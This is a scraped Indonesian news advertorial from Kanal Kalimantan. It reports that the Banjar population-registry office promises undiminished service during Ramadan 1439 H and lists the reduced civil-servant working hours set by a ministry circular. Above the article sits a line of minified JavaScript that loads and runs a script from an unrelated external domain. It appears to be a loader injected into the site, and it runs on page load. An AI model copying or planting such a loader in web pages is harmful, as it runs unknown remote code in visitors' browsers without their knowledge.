(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Bulan Puasa, Disdukcapil Banjar Pastikan Servis Tak Akan Kendur


MARTAPURA, Menghadapi bulan Ramadhan 1439 H, pelayanan di Dinas Kependudukan Dan Pencatatan Sipil (Disdukcapil) Kabupaten Banjar diyakini tak akan kendur alias melemah. Servis publik yang terbaik terhadap masyarakat yang berurusan dokumen kependudukan tetap maksimal meski menjalankan ibadah puasa.

Kadis Dukcapil Kabupaten Banjar Azwar SH MSi ketika menanggapi wacana pemerintah yang akan melakukan penyesuaian jam kerja bagi Aparatur Sipil Negara (ASN) selama bulan Ramadhan memastikan pelayanan yang mereka berikan tidak akan berpengaruh terhadap kinerja pelayanan kepada masyarakat.

Dia menjelaskan dalam sehari saja rata-rata ada ratusan pelayanan yang telah mereka berikan, contohnya pada Selasa (8/5), ada sebanyak 552 pengurusan Kartu Tanda Penduduk (KTP), seperti KTP baru, hilang, rusak, cetak ganti elemen dan 155 perekaman e-ktp.

“Dengan sebanyak 25 ASN dan 42 pegawai kontrak yang ada di Disdukcapil Kabupaten Banjar, saya yakin pelayanan yang diberikan tidak akan kendur,” ujarnya.

Menurut Azwar, pihaknya akan tetap memberikan pelayanan yang maksimal kepada masyarakat meskipun dalam keadaan menjalankan ibadah puasa.

“Walau jam kerja yang ditetapkan pada hari biasa, berbeda pada saat bulan Ramadhan, namun saya yakin pelayanan publik yang diberikan tidak akan melemah saat menjalankan ibadah puasa di bulan Ramadhan nanti,” tegas Azwar.

Azwar menjelaskan, disamping pelayanan yang telah diberikan pihaknya, mereka juga akan tetap menjalankan pelayanan-pelayanan keliling seperti di sekolah dan jemput bola di kecamatan-kecamatan.

Hal itu dilakukan terlebih untuk mendukung Gerakan Indonesia Sadar Administrasi (GISA) untuk membangun ekosistem pemerintahan yang sadar akan pentingnya administrasi kependudukan.


“Saya menghimbau kepada para petugas khususnya yang bertugas di Disdukcapil Kabupaten Banjar sendiri agar biasa-biasa dan normal saja untuk melakukan pelayanan yang telah diberikan, tidak ada pengenduran, tidak ada penurunan semangat, puasa merupakan ibadah jika diselingi dengan pekerjaan maka akan tambah banyak pahalanya, dan saya yakinkan puasa tidak akan memberatkan dan mengganggu pelayanan di Disdukcapil,” pungkas Azwar.

Perlu diketahui, memasuki bulan Ramaddan, pemerintah melakukan penyesuaian jam kerja bagi Aparatur Sipil Negara (ASN), TNI, dan Polri. Jadwal kerja ini berlaku selama bulan Ramadan 1439 H, Berdasarkan Surat Edaran Menteri Pendayagunaan Aparatur Negara dan Reformasi Birokrasi (Kemenpan RB) No 336/2018 tentang Penetapan Jam Kerja ASN, TNI, dan Polri selama Ramadan, jam kerja dikurangi satu jam dari biasanya.

Jumlah jam kerja bagi instansi pemerintah pusat dan daerah yang melaksanakan lima hari atau enam hari kerja menjadi 32,5 jam per minggu, hal ini diberikan agar ASN yang melaksanakan puasa dapat meningkatkan ibadahnya.

Seperti yang dikutip oleh Kanal Kalimantan dari berbagai sumber Kementerian Pendayagunaan Aparatur Negara dan Reformasi Birokrasi Republik Indonesia Asman Abnur, dalam siaran pers, Selasa (8/5).

“Walaupun berpuasa pelayanan publik harus tetap berjalan dan ASN tidak mengabaikan tugasnya sebagai pelayan masyarakat,” ujar  Asman.

Bagi instansi pemerintah yang melakukan lima hari kerja, Jam Senin-Kamis pukul 08.00-15.00. Untuk waktu istirahat pukul 12.00-12.30. Pada Jumat pukul 08.00-15.30 dengan waktu istirahat 11.30-12.30, Untuk instansi pemerintah yang memberlakukan enam hari kerja, jam kerja Senin-Kamis dan Sabtu pukul 08.00 – 14.00 dengan waktu istirahat pukul 12.00-12.30. Jam kerja Jumat pukul 08.00-14.30  dengan waktu istirahat pukul 11.30 – 12.30.

Surat edaran tersebut ditujukan kepada para Menteri Kabinet Kerja, Sekretaris Kabinet, Kepala Kepolisian Negara Republik Indonesia, Jaksa Agung Republik Indonesia, Panglima TNI, dan kepala lembaga pemerintah non kementerian. Kemudian, para pimpinan kesekretariatan lembaga negara, pimpinan kesekretariatan lembaga non struktural, pimpinan lembaga lainnya, gubernur, dan bupati/walikota. (rendy)

Reporter : Rendy
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

5 jam ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

7 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

9 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

11 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

11 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

11 jam ago

This website uses cookies.